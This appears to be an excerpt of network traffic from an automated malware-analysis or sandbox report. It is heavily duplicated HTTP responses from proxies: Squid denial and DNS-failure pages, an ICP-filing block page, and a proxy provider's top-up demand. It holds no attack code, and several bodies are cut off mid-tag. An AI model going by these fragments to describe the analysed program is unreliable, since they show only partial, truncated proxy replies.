Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 3699X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from hostX-Cache-Lookup: NONE from host:3128Connection: closeData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0 Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 3796X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 3796X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 3796X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:03 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
